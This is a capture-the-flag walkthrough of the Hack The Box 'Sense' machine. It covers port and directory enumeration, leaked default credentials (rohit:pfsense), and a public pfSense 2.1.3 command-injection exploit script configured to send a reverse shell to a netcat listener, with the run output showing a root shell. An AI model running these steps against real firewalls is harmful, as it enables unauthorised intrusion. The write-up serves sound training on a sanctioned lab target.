Hack The Box - Sense
Introduction
Sense is an easy rated machine on hackthebox. It is a short but interesting box that is especially good for beginners. I was a beginner myself when I wrote this write up. So let’s start anumerating the machine.
Enumeration
As always, I start with an nmap scan.
Nmap Scan
The first thing I do is a basic port scan of all ports:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/sense]
└─$ nmap sense.htb -vv -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-21 12:50 CEST
Initiating Ping Scan at 12:50
Scanning sense.htb (10.10.10.60) [2 ports]
Completed Ping Scan at 12:50, 0.02s elapsed (1 total hosts)
Initiating Connect Scan at 12:50
Scanning sense.htb (10.10.10.60) [65535 ports]
Discovered open port 443/tcp on 10.10.10.60
Discovered open port 80/tcp on 10.10.10.60
Completed Connect Scan at 12:52, 104.71s elapsed (65535 total ports)
Nmap scan report for sense.htb (10.10.10.60)
Host is up, received syn-ack (0.023s latency).
Scanned at 2021-08-21 12:50:38 CEST for 105s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT STATE SERVICE REASON
80/tcp open http syn-ack
443/tcp open https syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 104.82 seconds
I perform a script scan using the -A flag for those two open ports.
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/sense]
└─$ nmap sense.htb -A -p 80,443
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-21 13:02 CEST
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://sense.htb/
443/tcp open ssl/http lighttpd 1.4.35
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: lighttpd/1.4.35
|_http-title: 501
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=
CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
Nmap done: 1 IP address (1 host up) scanned in 15.21 seconds
Enumeration Of The Ports
Port 80
When accessing the page, I get automatically redirected to the HTTPS page on port 443. So I need to enumerate only this one port.
Port 443
I cannot access the page using the machine’s hostname. This happens when I try it:
So I access the page using it’s IP address:
Gobuster scan:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/sense]
└─$ gobuster dir -u https://sense.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt -k
---[snip]---
/index.php (Status: 200) [Size: 5793]
/index.html (Status: 200) [Size: 329]
/help.php (Status: 200) [Size: 5793]
/themes (Status: 301) [Size: 0] [--> https://sense.htb/themes/]
/stats.php (Status: 200) [Size: 5793]
/css (Status: 301) [Size: 0] [--> https://sense.htb/css/]
/edit.php (Status: 200) [Size: 5793]
/includes (Status: 301) [Size: 0] [--> https://sense.htb/includes/]
/license.php (Status: 200) [Size: 5793]
/system.php (Status: 200) [Size: 5793]
/status.php (Status: 200) [Size: 5793]
/javascript (Status: 301) [Size: 0] [--> https://sense.htb/javascript/]
/changelog.txt (Status: 200) [Size: 271]
/classes (Status: 301) [Size: 0] [--> https://sense.htb/classes/]
/exec.php (Status: 200) [Size: 5793]
/widgets (Status: 301) [Size: 0] [--> https://sense.htb/widgets/]
/graph.php (Status: 200) [Size: 5793]
/tree (Status: 301) [Size: 0] [--> https://sense.htb/tree/]
/wizard.php (Status: 200) [Size: 5793]
/shortcuts (Status: 301) [Size: 0] [--> https://sense.htb/shortcuts/]
/pkg.php (Status: 200) [Size: 5793]
/installer (Status: 301) [Size: 0] [--> https://sense.htb/installer/]
/wizards (Status: 301) [Size: 0] [--> https://sense.htb/wizards/]
/xmlrpc.php (Status: 200) [Size: 384]
/reboot.php (Status: 200) [Size: 5793]
/interfaces.php (Status: 200) [Size: 5793]
/csrf (Status: 301) [Size: 0] [--> https://sense.htb/csrf/]
/system-users.txt (Status: 200) [Size: 106]
/filebrowser (Status: 301) [Size: 0] [--> https://sense.htb/filebrowser/]
There are a lot of directories and files. The first I checked is index.html:
There is a file linked, but it does not do anything when I call it: https://10.10.10.60/dfuife.cgi. I tried many of the php files, but I need to login in order to use them.
There are two .txt files, let’s try to access them. Here is system-users.txt:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
Here is changelog.txt:
# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required
### Mitigated
2 of 3 vulnerabilities have been patched.
### Timeline
The remaining patches will be installed during the next maintenance window
Now I know that the application has an open vulnerability. I also know a username, rohit, and that the password for this user is the company defaults. The company is called pfsense, so that may be the password.
That worked, now I can search for an exploit. The version can be found on the main page: 2.1.3
Exploitation
If found an exploit from spencerdodd that creates a reverse shell, it is available here:
I have to note that I will use the PHP reverse shell payload, there is also a Metasploit version available. (Because for OSCP I practice w/o Metasploit) Download the file and edit these things:
username = "rohit"
password = "pfsense"
listener_ip = "10.10.17.28"
listener_port = "4444"
target_ip = "10.10.10.60"
Now, start a netcat listener and execute the script:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/sense]
└─$ nano pfsense_exec.py
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/sense]
└─$ chmod +x pfsense_exec.py
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/sense]
└─$ python3 pfsense_exec.py nc
[*] setting payload to nc reverse shell (catch with 'nc -lvp PORT')
[*] exploiting pfsense_graph_injection_exec
[*] generating obfuscated/encoded reverse shell payload for 10.10.17.28:4444
[+] generated obfuscated/encoded payload
[+] authenticating to firewall with (rohit:pfsense)
[+] grabbed CSRF token: sid:0472d865e642eaf8e1a35873acdde486db446d18,1629552345
[+] authentication successful!
[+] grabbed CSRF token: sid:ceb361329e5284adddcd8bf90eca9a3fe0c93c4f,1629552346
[*] octal encoding payload
[+] encoding complete
[*] injecting into https://10.10.10.60/status_rrd_graph_img.php
[+] exploit code injected successfully
[*] triggering the exploit (make sure to catch on 10.10.17.28:4444)
Have yourself a look at the netcat listener, a shell should have spawned.
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/sense]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.17.28] from (UNKNOWN) [10.10.10.60] 4621
whoami
root
It’s a surprise that the application runs as root, but I take it. So it’s time to get the flags.
Flags
Since I got a root shell and no privesc was necessary, I can get both flags in one go:
ls /home
.snap
rohit
cat /home/rohit/user.txt
87**************************348b
cat /root/root.txt
d0**************************1a86
Conclusions
The box was nice and fast. It was straight forward. I wish that there was a privesc, it would be more difficult with one. I can definetly recommend the box to peoples that are new to the pentesting and are preparing for their OSCP.